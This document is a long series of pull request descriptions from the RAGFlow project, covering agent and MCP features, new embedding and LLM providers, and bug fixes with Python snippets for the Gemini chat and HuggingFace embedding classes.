- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR enhances the application's capabilities by adding support for
four new Voyage embedding models (voyage-3-large, voyage-3.5,
voyage-3.5-lite, and voyage-code-3) to the `llm_factories.json`
configuration file. These models expand the available options for text
embedding tasks, enabling improved processing of text data with a
maximum token limit of 32,000. This addition addresses the need for more
diverse and specialized embedding models to support various use cases
without altering existing functionality.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add agent tool CrawlerForm #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add CrawlerForm component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display file references for agent dialogues #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixed invalid save() arguments for slide thumbnails.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add authorization token field to the MCP form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix context loss caused by separating markdown tables from original
text. #6871, #8804.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This change adds 'Vietnamese' to the list of supported languages in two
components related to cross-language functionality. The addition expands
language support by including Vietnamese as a selectable option
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixes no chunks parsed out for Law. #5113
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust agent mcp style #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Synchronize MCP data to agent #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Render the mcp list on the agent page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Filter MCP server list by text. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### AgentCreateBUGFix
Because useFetchFlowTemplates is called both in the hooks and the
AgentTemplateModal, and the ID of the empty template is generated via
uuid, there may be cases where the IDs do not match.
Report a BUG as follows:
Prompt: 101
Required argument is missing: dsl;
<img width="472" height="121" alt="52d79682-4e50-4863-8486-f1e154003043"
src="https://github.com/user-attachments/assets/c5d217c9-b6cc-4ef2-866b-694c8b9ab3ae"
/>
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: 海贼宅 <stu_xyx@163.com>
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [x] Refactoring
- [x] Performance Improvement
- [ ] Other (please describe):
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
Add document viewers for text and markdown files
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Import and export MCP Server #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix dataset-page's bugs,Input component supports icon, added Radio
component, and removed antd from chunk-result-bar page [#3221
](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Change document status in bulk.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add xAI provider (experimental feature, requires user feedback).
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the agent tool name #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixes a function name typo for the `/list` route in
`api/apps/conversation_app.py`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Avoid the form sheet covering the chat sheet #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The rm function in chunk_app.py now takes the index name differently
than other functions, so there will be situations where users can create
and update a chunk but not delete it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Based on https://github.com/infiniflow/ragflow/issues/8740
1. A better handle for 'NoneType' object is not subscriptable
2. Add some logs to get the internal message
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Changed the default value of `chunk_token_num` from 128 to 512 in both
HTTP and Python API reference documentation to reflect the updated
configuration.
#8753
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Updated the default `chunk_token_num` value in `api_utils.py` and
`validation_utils.py` to 512 to accommodate larger text chunks. Adjusted
corresponding test cases in HTTP and SDK API tests to reflect this
change.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display MCP multiple selection bar #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Validate dialog name in `dialog_app.py` to ensure it is a non-empty
string and does not exceed 255 bytes in UTF-8 encoding.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Change the data in the dataset page to be obtained using the interface,
and change the import to obtain all data every 15 seconds to obtain the
data of the current page every 5 seconds when parsing the existing file.
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This commit introduces a comprehensive test suite for the dialog app,
including tests for creating, updating, retrieving, listing, and
deleting dialogs. Additionally, the common.py file has been updated to
include necessary API endpoints and helper functions for dialog
operations.
### Type of change
- [x] Add test cases
### What problem does this PR solve?
1. Remove the useless pop logic due to already been checked at the if
logic
2. merge log logic
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Added support for preview of txt, md, excel, csv, ppt, image, doc and
other files [#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Get the running log of each message through the trace interface
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
'handleOk' was used before it was
defined.eslint@typescript-eslint/no-use-before-define
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Suppress docker-compose warning like:
```bash
The "HF_ENDPOINT" variable is not set. Defaulting to a blank string.
The "MACOS" variable is not set. Defaulting to a blank string.
The "SANDBOX_EXECUTOR_MANAGER_IMAGE variable is not set. Defaulting to a blank string.
The "SANDBOX_EXECUTOR_MANAGER_PORT variable is not set. Defaulting to a blank string.
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
Use use-chunk-request.ts to replace chunk-hooks.ts; implement chunk
selectAll, enable, disable and other functions
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Ensure consistent Minio deployment by pinning the image to a specific
release version (RELEASE.2025-06-13T11-33-47Z) for stability and
reproducibility.
- #8672
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Support uploading files when running agent #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
fix: retry embedding with Qwen family models when limits temporarily
reached.
APIs of Qwen family models are limited by calling rates. When reached,
the "output" attribute of the "resp" will be None, and in turn cause
TypeError when trying to retrieve "embeddings". Since these limits are
almost temporary, I have added a simple retry mechanism to avoid it.
Besides, if retry_max reached, the error can be early raised, instead of
hidden behind "TypeError".
### What problem does this PR solve?
Sometimes Qwen blocks calling due to rate limits, but it will cause the
whole parsing procedure stops when creating knowledge base. In this
situation, resp["output"] will be None, and resp["output"]["embeddings"]
will cause TypeError. Since the limits are temporary, I apply a simple
retry mechanism to solve it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Fix the case where pages variable might be None
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
1.The old base image lost the curl command, and an updated image was
used to fix this issue (the service has been tested in the new version)
2.Add Health Check
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix a small typo in count of used fragments.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: Wrong Citation Display #8594#8474
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix: Create a new message component to replace the antd message
component, create a new Spin component to replace the antd Spin
component, optimize the original paging component style, and optimize
the chunk result page[
#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Optimized the style of the dataset configuration page and added the
logic of cancelling submission
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Resolves ambiguity and potential MITM attacks by using official channel
for chromedriver-linux in download_deps.py
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Fix: Fixed the issue where the debug form Switch component had no
default value #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue of retrieval operator text overlapping #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Edit the output data of the code operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display the iteration operator toolbar #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Optimize the style and logic of the profile [#3221
](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Combine the output logs of the same operator together #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Issue #8602
`parser_config.task_page_size` can be defaults to `None` when dataset is
created by API. This was not handled by the `task_executor.py` code thus
`page_size` could sometimes be `None` which will cause issue in line
351.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The following error occurred during local testing, which should be fixed
by configuring 'exist_ok=True'.
```log
set_progress(7461edc2535c11f0a2aa0242c0a82009), progress: -1, progress_msg: 21:41:41 Page(1~100000001): [ERROR][Errno 17] File exists: '/ragflow/tmp'
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Update Chrome download URL in use_china_mirrors configuration
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: lqh <liqunhuan@foreveross.com>
### What problem does this PR solve?
Feat: Convert the arguments parameter of the code operator to a
dictionary #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix the config option name of the opendal table name and setting of
'max_allowed_packet'.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: He Wang <wanghechn@qq.com>
### What problem does this PR solve?
This PR introduces Google Cloud Vision API integration to enhance image
understanding capabilities in the application. It addresses the need for
advanced image description and chat functionalities by implementing a
new `GoogleCV` class to handle API interactions and updating relevant
configurations. This enables users to leverage Google Cloud Vision for
image-to-text tasks, improving the application's ability to process and
interpret visual data.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Construct the to field of the classification operator when saving
data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Add comprehensive test suite for chunk operations including:
- Test files for create, list, retrieve, update, and delete chunks
- Authorization tests
- Batch operations tests
- Update test configurations and common utilities
- Validate `important_kwd` and `question_kwd` fields are lists in
chunk_app.py
- Reorganize imports and clean up duplicate code
### Type of change
- [x] Add test cases
### What problem does this PR solve?
docx parse error.

### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Some docx parse with naive cause error. `block.style.name` in Function
`__get_nearest_title` will be None in some case.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: wenxuan.zhang <wenxuan.zhang@chinacreator.com>
### What problem does this PR solve?
Fix: Fixed the issue that the global variables of the code operator
cannot be selected #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where variables were not displayed in the switch
operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR addresses an incompatibility issue with the Google Chat API by
correcting the message content format in the `GoogleChat` class.
Previously, the content was directly assigned to the "parts" field,
which did not align with the API's expected format. This change ensures
that messages are properly formatted with a "text" key within a
dictionary, as required by the API.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add agent advanced settings form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: the output log is incorrect
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: liang <xiaofeng.liang@landstech.com.cn>
### What problem does this PR solve?
Add file management HTTP_API for operating files
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR enables the `Form` component within the `GoogleModal` to
directly access and manipulate the form state by passing the form
instance from the parent component. This enhances form control and data
manipulation capabilities within the modal, improving the component's
functionality and integration with the parent form.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: In a dialog message, users can enter different types of data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Switching threading.Lock() to asyncio.Lock(), since threading.Lock() is
blocking.
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Fixed the issue that the top toolbar disappears when opening the
agent operator form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Support GiteeAI model #1853
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Allow users to enter text in the middle of a chat #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the begin operator parameters could not be
submitted during debugging #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display sub-agents in agent form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the prompt menu content was hidden #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Allow users to choose which MCP tools are enabled.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR addresses critical memory leaks in the task executor's image
processing pipeline. The current implementation fails to properly
dispose of PIL Image objects and BytesIO buffers during chunk
processing, leading to progressive memory accumulation that can cause
the task executor to consume excessive memory over time.
### Background context
- The `upload_to_minio` function processes images from document chunks
and converts them to JPEG format for storage.
- PIL Image objects hold significant memory resources that must be
explicitly closed to prevent memory leaks.
- BytesIO objects also consume memory and should be properly disposed of
after use.
- In high-throughput scenarios with many image-containing documents,
these memory leaks can lead to out-of-memory errors and degraded
performance.
### Specific issues fixed
- PIL Image objects were not being explicitly closed after processing.
- BytesIO buffers lacked proper cleanup in all code paths.
- Converted images (RGBA/P to RGB) were not disposing of the original
image object.
- Memory references to large image data were not being cleared promptly.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Performance Improvement
### Changes made
- Added explicit `d["image"].close()` calls after image processing
operations.
- Implemented proper cleanup of converted images when changing formats
from RGBA/P to RGB.
- Enhanced BytesIO cleanup with `try/finally` blocks to ensure disposal
in all code paths.
- Added explicit `del d["image"]` to clear memory references after
processing.
This fix ensures stable memory usage during long-running document
processing tasks and prevents potential out-of-memory conditions in
production environments.
### What problem does this PR solve?
improve the logic to check cancel
### Type of change
- [x] Refactoring
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
stack:
```
2025-06-26 17:22:24,739 ERROR 1609 list index out of range
Traceback (most recent call last):
File "/ragflow/.venv/lib/python3.10/site-packages/flask/app.py", line 880, in full_dispatch_request
rv = self.dispatch_request()
File "/ragflow/.venv/lib/python3.10/site-packages/flask/app.py", line 865, in dispatch_request
return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) # type: ignore[no-any-return]
File "/ragflow/api/utils/api_utils.py", line 298, in decorated_function
return func(*args, **kwargs)
File "/ragflow/api/apps/sdk/session.py", line 472, in list_session
print(conv["reference"][message_num])
IndexError: list index out of range
```

### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add StringTransform operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
In web folder's prompt-editor component, when entering content for the
first time, the cursor position is abnormal and it will automatically
wrap
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: leonlai <owllai123456>
### What problem does this PR solve?
Fix chunk number error after re-parsing. #8503.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Displays the output variable type selected by the loop operator
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Include optional `tag_feas` field if present in request
- Add input validation for `important_kwd` and `question_kwd` to ensure
they are lists
- #8462
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Customize the output variable name of the loop operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add UserFillUpForm component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add MCP dashboard functionalities list_tools and test_tool.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR addresses an issue in the presentation parser where the
`layout_recognize` configuration was incorrectly retrieved from
`kwargs.get("layout_recognize", "DeepDOC")`. Instead, it should be
sourced from the `parser_config` parameter, specifically
`parser_config.get("layout_recognize", "DeepDOC")`.
This mismatch could cause the parser to default to the "DeepDOC" layout
recognizer, ignoring any alternative recognition method specified in the
parser configuration. As a result, PDF document parsing might use an
incorrect recognition engine.
The fix ensures the presentation parser consistently uses the
`layout_recognize` setting from `parser_config`, aligning with the
configuration access patterns used elsewhere in the codebase.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Allow operators inside the loop operator to reference the output
parameters of external operators #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add retrieval tool #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR adds fields to the `Chunk` class to store retrieval results like
similarity scores, term similarity, vector similarity, positions, and
document type. This allows the chunk object to hold all the information
needed when returning search results from the vector database.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Previous:
- Defaulted to hardcoded model 'BAAI/bge-large-zh-v1.5@BAAI'
- Did not respect user-configured default embedding_model
Now:
- Correctly prioritizes user-configured default embedding_model
Other:
- Make embedding_model optional in CreateDatasetReq with proper None
handling
- Add default embedding model fallback in dataset update when empty
- Enhance validation utils to handle None values and string
normalization
- Update SDK default embedding model to None to match API changes
- Adjust related test cases to reflect new validation rules
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
[https://github.com/infiniflow/ragflow/issues/8324](url)
docker image version: v0.19.1
The `_clean_conf` function was not implemented in the `_chat` and
`chat_streamly` methods of the `GeminiChat` class, causing the error
"Unknown field for GenerationConfig: max_tokens" when the default LLM
config includes the "max_tokens" parameter.
**Buggy Code(ragflow/rag/llm/chat_model.py)**
```python
class GeminiChat(Base):
def __init__(self, key, model_name, base_url=None, **kwargs):
super().__init__(key, model_name, base_url=base_url, **kwargs)
from google.generativeai import GenerativeModel, client
client.configure(api_key=key)
_client = client.get_default_generative_client()
self.model_name = "models/" + model_name
self.model = GenerativeModel(model_name=self.model_name)
self.model._client = _client
def _clean_conf(self, gen_conf):
for k in list(gen_conf.keys()):
if k not in ["temperature", "top_p"]:
del gen_conf[k]
return gen_conf
def _chat(self, history, gen_conf):
from google.generativeai.types import content_types
system = history[0]["content"] if history and history[0]["role"] == "system" else ""
hist = []
for item in history:
if item["role"] == "system":
continue
hist.append(deepcopy(item))
item = hist[-1]
if "role" in item and item["role"] == "assistant":
item["role"] = "model"
if "role" in item and item["role"] == "system":
item["role"] = "user"
if "content" in item:
item["parts"] = item.pop("content")
if system:
self.model._system_instruction = content_types.to_content(system)
response = self.model.generate_content(hist, generation_config=gen_conf)
ans = response.text
return ans, response.usage_metadata.total_token_count
def chat_streamly(self, system, history, gen_conf):
from google.generativeai.types import content_types
if system:
self.model._system_instruction = content_types.to_content(system)
#❌_clean_conf was not implemented
for k in list(gen_conf.keys()):
if k not in ["temperature", "top_p", "max_tokens"]:
del gen_conf[k]
for item in history:
if "role" in item and item["role"] == "assistant":
item["role"] = "model"
if "content" in item:
item["parts"] = item.pop("content")
ans = ""
try:
response = self.model.generate_content(history, generation_config=gen_conf, stream=True)
for resp in response:
ans = resp.text
yield ans
yield response._chunks[-1].usage_metadata.total_token_count
except Exception as e:
yield ans + "\n**ERROR**: " + str(e)
yield 0
```
**Implement the _clean_conf function**
```python
class GeminiChat(Base):
def __init__(self, key, model_name, base_url=None, **kwargs):
super().__init__(key, model_name, base_url=base_url, **kwargs)
from google.generativeai import GenerativeModel, client
client.configure(api_key=key)
_client = client.get_default_generative_client()
self.model_name = "models/" + model_name
self.model = GenerativeModel(model_name=self.model_name)
self.model._client = _client
def _clean_conf(self, gen_conf):
for k in list(gen_conf.keys()):
if k not in ["temperature", "top_p"]:
del gen_conf[k]
return gen_conf
def _chat(self, history, gen_conf):
from google.generativeai.types import content_types
#✅ implement _clean_conf to remove the wrong parameters
gen_conf = self._clean_conf(gen_conf)
system = history[0]["content"] if history and history[0]["role"] == "system" else ""
hist = []
for item in history:
if item["role"] == "system":
continue
hist.append(deepcopy(item))
item = hist[-1]
if "role" in item and item["role"] == "assistant":
item["role"] = "model"
if "role" in item and item["role"] == "system":
item["role"] = "user"
if "content" in item:
item["parts"] = item.pop("content")
if system:
self.model._system_instruction = content_types.to_content(system)
response = self.model.generate_content(hist, generation_config=gen_conf)
ans = response.text
return ans, response.usage_metadata.total_token_count
def chat_streamly(self, system, history, gen_conf):
from google.generativeai.types import content_types
#✅ implement _clean_conf to remove the wrong parameters
gen_conf = self._clean_conf(gen_conf)
if system:
self.model._system_instruction = content_types.to_content(system)
#✅Removed duplicate parameter filtering logic "for k in list(gen_conf.keys()):"
for item in history:
if "role" in item and item["role"] == "assistant":
item["role"] = "model"
if "content" in item:
item["parts"] = item.pop("content")
ans = ""
try:
response = self.model.generate_content(history, generation_config=gen_conf, stream=True)
for resp in response:
ans = resp.text
yield ans
yield response._chunks[-1].usage_metadata.total_token_count
except Exception as e:
yield ans + "\n**ERROR**: " + str(e)
yield 0
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Filter the query variable drop-down box options by type #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR fixes a typo in the variable name `succesfulFilenames`,
correcting it to `successfulFilenames`. This ensures consistency and
avoids potential errors due to the misspelled variable.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: when using external components, it is impossible to specify the
port, because the variables in the `docker/.env` variable were not
referenced by `docker/service_conf.yaml.template`.
382d2d0373/docker/.env (L85)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Insert the node data of the bottom subagent into the tool array of
the head agent #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Using the QA chunking method with a large PDF (e.g., 300+ pages) may
lead to OOM in the ragflow-worker module.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add MCP treamable-http transport.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8466
I go through the codes, current logic:
When do_handle_task raises an exception, handle_task will set the
progress, but for some cases do_handle_task internal will just return
but not set the right progress, at this cases the redis stream will been
acked but the task is running.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Add MCP server dashboard operations.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
This PR will fix the #8271 by extending int type to float type when
there is any value out of long type range in a column.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add IterationNode component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Saving an RGBA image directly as JPEG will cause an error. If the image
is in RGBA mode, convert it to RGB mode before saving it in JPG format.
### What problem does this PR solve?
During document parsing in the knowledge base, we occasionally encounter
the error 'cannot write mode RGBA as JPEG.' This occurs because images
in RGBA mode cannot be directly saved as JPEG. They must be converted
first before saving.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Add new test suite for document app with
create/list/parse/upload/remove tests
- Update API URLs to use version variable from config in HTTP and web
API tests
### Type of change
- [x] Add test cases
### What problem does this PR solve?
before refactor
1. create file record
2. Add to blob
if have some execption at 2 the system db will have a file record but
not have related blob, which will introduce some bug.
after refactor
1. add to blob
2. create file record.
if 1 success but 2 failed just have a dirty blob in blob system, user
will not feel that
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Delete the agent and tool nodes downstream of the agent node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
image_version: v0.19.1
This PR fixes a bug in the HuggingFaceEmBedding API method that was
causing AssertionError: assert len(vects) == len(docs) during the
document embedding process.
#### Problem
The HuggingFaceEmbed.encode() method had an early return statement
inside the for loop, causing it to return after processing only the
first text input instead of processing all texts in the input list.
**Error Messenge**
```python
AssertionError: assert len(vects) == len(docs) # input chunks != embedded vectors from embedding api
File "/ragflow/rag/svr/task_executor.py", line 442, in embedding
```
**Buggy code(/ragflow/rag/llm/embedding_model.py)**
```python
class HuggingFaceEmbed(Base):
def __init__(self, key, model_name, base_url=None):
if not model_name:
raise ValueError("Model name cannot be None")
self.key = key
self.model_name = model_name.split("___")[0]
self.base_url = base_url or "http://127.0.0.1:8080"
def encode(self, texts: list):
embeddings = []
for text in texts:
response = requests.post(...)
if response.status_code == 200:
try:
embedding = response.json()
embeddings.append(embedding[0])
# ❌ Early return
return np.array(embeddings), sum([num_tokens_from_string(text) for text in texts])
except Exception as _e:
log_exception(_e, response)
else:
raise Exception(...)
```
**Fixed Code(I just Rollback this function to the v0.19.0 version)**
```python
Class HuggingFaceEmbed(Base):
def __init__(self, key, model_name, base_url=None):
if not model_name:
raise ValueError("Model name cannot be None")
self.key = key
self.model_name = model_name.split("___")[0]
self.base_url = base_url or "http://127.0.0.1:8080"
def encode(self, texts: list):
embeddings = []
for text in texts:
response = requests.post(...)
if response.status_code == 200:
embedding = response.json()
embeddings.append(embedding[0]) # ✅ Only append, no return
else:
raise Exception(...)
return np.array(embeddings), sum([num_tokens_from_string(text) for text in texts]) # ✅ Return after processing all
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Use the message_id returned by the interface as the id of the
reply message #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This is a cherry-pick from #7781 as requested.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Update .env ,Defaults to the v0.19.1-slim edition
### Type of change
- [x] Other (please describe): Update .env ,Defaults to the
v0.19.1-slim edition
### What problem does this PR solve?
- Simplify AzureChat constructor by passing base_url directly
- Clean up spacing and formatting in chat_model.py
- Remove redundant parentheses and improve code consistency
- #8423
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change: Documentation Update/Refactoring
#### Summary
Adds HTTPS/SSL configuration guide/example to enable secure RAGFlow
deployments with proper certificate management.
#### Changes
- New HTTPS Setup Section: Step-by-step guide for SSL certificate
configuration
- Let's Encrypt Integration: Complete Certbot setup instructions
- Docker Configuration: Volume mapping examples for certificates
#### Key Features
- Prerequisites checklist
- Docker Compose configuration examples
- Support for both Let's Encrypt and existing certificates
#### Files Modified
- `README.md`
- `ragflow.https.conf` (new file)
### What problem does this PR solve?
Feat: The delete button is displayed only when the cursor is hovered
over the connection line #3221
### Type of change
